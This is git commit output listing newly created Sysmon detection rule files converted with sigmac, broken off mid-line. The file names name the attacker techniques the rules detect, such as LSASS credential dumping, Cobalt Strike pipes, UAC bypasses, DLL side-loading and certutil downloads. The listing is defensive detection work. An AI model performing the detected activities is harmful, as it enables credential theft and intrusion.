tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_get_variable.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_homoglyph_filename.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_lnk_double_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_pfx_file_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_powershell_profile.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_startup_folder_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_system_interactive_powershell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_task_write.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_teamviewer_remote_session.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_vscode_powershell_profile.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_windows_terminal_profile.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_winsxs_binary_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_sysinternals_psexec_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_sysinternals_psexec_service_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_taskmgr_lsass_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_tsclient_filewrite_startup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_eventvwr.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_ieinstal.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_winsat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_wmp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_vhd_download_via_browsers.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_webshell_creation_detect.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_werfault_dll_hijacking.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_winrm_awl_bypass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_wmiexec_default_filename.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_wpbbin_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_writing_local_admin_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_cmstp_load_dll_from_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_amsi_suspicious_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_credui_uncommon_process_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_pcre_dotnet_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_rstrtmgr_suspicious_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_rstrtmgr_uncommon_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_sdiageng_load_by_msdt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_system_management_automation_susp_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_tttracer_module_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_vss_ps_susp_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_vssapi_susp_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_vsstrace_susp_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_hktl_sharpevtmute.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_hktl_silenttrinity_stager.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_lsass_unsigned_image_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_dotnet_assembly_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_dotnet_clr_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_dotnet_gac_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_dsparse_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_excel_xll_susp_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_kerberos_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_outlook_outlvba_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_powershell_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_vbadll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_rundll32_remote_share_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_scrcons_wmi_scripteventconsumer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_7za.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_abused_dlls_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_antivirus.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_appverifui.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_avkkid.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_ccleaner_du.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_ccleaner_reactivator.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_chrome_frame_helper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_classicexplorer32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_comctl32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_coregen.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_cpl_from_non_system_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_dbgcore_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_dbghelp_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_eacore.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_edputil.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_from_non_system_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_goopdate.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_gup_libcurl.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_iviewers.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_jsschhlp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_libvlc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_mfdetours.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_mfdetours_unsigned.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_non_existent_dlls.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_office_dlls.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_rcdll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_rjvplatform_default_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_rjvplatform_non_default_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_robform.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_shell_chrome_api.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_shelldispatch.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_smadhook.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_solidpdfcreator.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_third_party.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_ualapi.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_vivaldi_elf.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_vmguestlib.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_vmmap_dbghelp_signed.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_vmware_xfer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_waveedit.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_wazuh.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_windows_defender.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_wwlib.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_spoolsv_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_susp_dll_load_system_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_susp_python_image_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_susp_script_dotnet_clr_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_susp_uncommon_image_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_thor_unsigned_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_uac_bypass_iscsicpl.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_uac_bypass_via_dism.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_wmi_persistence_commandline_event_consumer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_wsman_provider_image_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_addinutil.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_binary_susp_com.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_certutil_initiated_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_crypto_mining_pools.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_dead_drop_resolvers.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_devtunnel_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_dfsvc_uncommon_ports.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_dllhost_net_connections.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_eqnedt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_excel_outbound_network_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_google_api_non_browser_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_hh.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_imewdbld.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_mega_nz.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_msiexec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_ngrok_domains.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_ngrok_tunnel.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_notepad_network_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_notion_api_susp_communication.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_office_susp_ports.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_powershell_network_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_python.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_rdp_reverse_tunnel.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_rdp_to_http.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_reddit_api_non_browser_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_regsvr32_network_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_remote_powershell_session_network.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_rundll32_net_connections.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_script.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_script_wan.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_binary_no_cmdline.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_cmstp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_dropbox_api.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_epmap.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_external_ip_lookup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_malware_callback_port.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_outbound_smtp_connections.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_prog_location_network_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_telegram_api_non_browser_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_vscode_tunnel_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_winlogon_net_connections.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_wuauclt_network_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_hktl_cobaltstrike.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_re.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_hktl_coercedpotato.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_hktl_diagtrack_eop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_hktl_efspotato.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_hktl_koh_default_pipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_powershell_alternate_host_pipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_powershell_execution_pipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_pua_csexec_default_pipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_pua_paexec_default_pipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_pua_remcom_default_pipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_susp_malicious_namedpipes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_cmstp_execution_by_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_hktl_generic_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_hktl_littlecorporal_generated_maldoc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_hktl_sysmonente.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_dump_keyword_image.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_memdump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_python_based_tool.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_seclogon_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_susp_access_flag.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_werfault.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_whitelisted_process_names.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_susp_invoke_patchingapi.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_susp_shellcode_injection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_svchost_credential_dumping.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_svchost_susp_access_request.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_uac_bypass_wow64_logger.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_7zip_password_compression.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_7zip_password_extraction.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_adplus_memory_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_agentexecutor_susp_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_at_interactive_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_attrib_hiding_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_attrib_system.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_attrib_system_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_auditpol_nt_resource_kit_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_auditpol_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bash_command_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bash_file_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bcdedit_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bitsadmin_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_chromium_load_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_inline_file_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_remote_debugging.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_browsers_tor_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_calc_uncommon_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certmgr_certificate_installation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certoc_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certoc_download_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certoc_load_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_certificate_installation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_decode.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_download_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_encode.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_encode_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_export_pfx.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_certutil_ntlm_coercion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_chcp_codepage_lookup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_chcp_codepage_switch.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_clip_execution.yml create mode 100644 